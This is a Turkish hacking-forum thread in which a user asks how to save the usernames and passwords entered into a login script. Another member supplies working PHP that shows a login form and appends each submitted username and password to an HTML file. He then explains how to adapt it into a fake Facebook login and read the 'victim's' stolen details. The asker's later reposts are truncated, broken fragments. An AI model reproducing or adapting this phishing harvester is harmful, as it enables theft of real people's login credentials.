Girilen bilgileri txt kaydetme

Googxx

Yeni üye
1 Mar 2020
13
0
Merhabalar. Bende bir login scripti var. Ben bu scriptte username password yerini dolduranların bilgilerini txt kaydetmek istiyorum. İnternetten ne bulduysam denedim ama yapamadım. Nasıl yaparım?

G286745365

Üye
13 May 2019
151
0
<?php

echo '
<html>
<form name="as" action="" method="post">
Username :
<input type="text" name="user">
<br>
Password :
<input type="password" name="password">
<br>
<button type="submit" name="sik">Gir</button></form>
</html>
';

$jvc = $_POST['user']; #USERNAMEYİ ÇEKİYOR

$jerus = $_POST['password']; # PASS ÇEKİYOR

$metin = '<html><center><h3>User : '.$jvc.' // Pass : '.$jerus.'</h3></center></html>'; #HTML DE TOPLUYOR

if (isset($_POST['password'])) {

$kok = fopen("gelsin.html", "a");
fwrite($kok, $metin);
fclose($kok);
}

?>

üşenmedim kodladım dostum :) zamanında bende çok takılmıştım buyur rahatına bak

Googxx

Yeni üye
1 Mar 2020
13
0
<?php

echo '
<html>
Username :
<br>
Password :
<br>
</html>
';

$metin = '<html><center><h3>User : '.$jvc.' // Pass : '.$jerus.'</h3></center></html>'; #HTML DE TOPLUYOR

fwrite($kok, $metin);
fclose($kok);
}

?>

çok sağol reis. Bunları yeni bir dosya oluşturup mu yapıştırayım? Bir de nereleri kendim değişmem gerekir?

G286745365

Üye
13 May 2019
151
0
user password bölümlerini değiştirsen yetereli olur mesela login ne senin face scripti ise e posta oalrak değiştirirsin useri password değiştirmene gerek yok ve en alttaki gelsin.txt değiştir kenine göre çünkü sitenin sonuna onu yazınca mesela googz.txt yazınca txt bilgileri gelicewk yani kurbanın bilgileri umarım yyardımcı olmuşumdur

Googxx

Yeni üye
1 Mar 2020
13
0
user password bölümlerini değiştirsen yetereli olur mesela login ne senin face scripti ise e posta oalrak değiştirirsin useri password değiştirmene gerek yok ve en alttaki gelsin.txt değiştir kenine göre çünkü sitenin sonuna onu yazınca mesela googz.txt yazınca txt bilgileri gelicewk yani kurbanın bilgileri umarım yyardımcı olmuşumdur

çok sağol reis çok yardımcı oldun. <html> </html> etiketleri arasındakileri yazmama gerek yok demi

<?php

echo '
<html>
Username :
<br>
Password :
<br>
</html>
';

fwrite($kok, $metin);
fclose($kok);
}

?>

yapamadım reis öm atıyorum kusura bakma

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.